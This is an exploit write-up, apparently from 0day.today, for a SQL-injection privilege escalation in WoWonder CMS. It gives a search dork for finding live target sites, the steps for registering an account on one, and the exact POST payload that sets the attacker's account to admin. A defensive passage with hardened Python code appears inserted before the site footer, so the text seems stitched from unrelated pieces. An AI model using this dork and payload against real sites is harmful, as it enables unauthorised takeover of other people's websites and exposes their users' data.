Today I will explain a privilege escalation exploit in the WoWonder CMS.
First we need Firefox (v56.0.2 or earlier), and then we download HackBar: https://addons.mozilla.org/es/firefox/addon/hackbar/
Note: If the bar does not appear, press F9 to show or hide it.
Once everything is ready, we use the following dork to search for pages running this CMS:
inurl: "? link1 = welcome"
Once we have chosen our target, we register an account. When registration is complete, we load the URL in HackBar, enable POST data, and append the following to the target's URL: requests.php?f=save_user_location
In the POST data field we add: lat = 0000&lng=, admin=CHAR (49) WHERE username = CONCAT () -- 0
Between the parentheses of CONCAT (), we add our username converted to MySQL CHAR, and then execute the request. The server should return response code 200, which means that the exploit worked. Now we go to /admin-cp and we are done.
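The shape of the POST data above (a comma, a second column assignment and a new WHERE clause inside the lng field) implies that the handler builds its UPDATE statement by pasting lat and lng in as text. A hardened form of such a handler, as an added example that is not WoWonder's code: the users schema, the function names and SQLite standing in for MySQL are all assumptions.

```python
import math
import sqlite3

def parse_coord(raw, limit):
    """Accept only a finite decimal number within [-limit, limit]."""
    try:
        value = float(raw)
    except (TypeError, ValueError):
        raise ValueError("coordinate is not a number") from None
    if not math.isfinite(value) or abs(value) > limit:
        raise ValueError("coordinate out of range")
    return value

def save_user_location(db, session_user_id, post):
    """Hypothetical hardened handler for a save_user_location request."""
    lat = parse_coord(post.get("lat"), 90.0)
    lng = parse_coord(post.get("lng"), 180.0)
    # Placeholders keep the values as data, never as SQL text. The row to
    # update is taken from the server-side session, not from the request.
    cur = db.execute(
        "UPDATE users SET lat = ?, lng = ? WHERE user_id = ?",
        (lat, lng, session_user_id),
    )
    db.commit()
    return cur.rowcount

def make_demo_db():
    """Constructed in-memory table (assumed schema) with one ordinary user."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT,"
        " admin INTEGER DEFAULT 0, lat REAL, lng REAL)"
    )
    db.execute("INSERT INTO users (user_id, username) VALUES (1, 'alice')")
    return db

def is_admin(db, user_id):
    row = db.execute("SELECT admin FROM users WHERE user_id = ?", (user_id,))
    return row.fetchone()[0]

if __name__ == "__main__":
    db = make_demo_db()
    print(save_user_location(db, 1, {"lat": "40.4168", "lng": "-3.7038"}))
    # Constructed request carrying the POST data shown in the write-up.
    hostile = {"lat": "0000", "lng": ", admin=CHAR (49) WHERE username = CONCAT () -- 0"}
    try:
        save_user_location(db, 1, hostile)
    except ValueError as exc:
        print("rejected:", exc)
    print("admin flag:", is_admin(db, 1))
```

On MySQL the same structure applies with PDO or mysqli prepared statements in place of sqlite3.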
# 0day.today [2018-01-09] #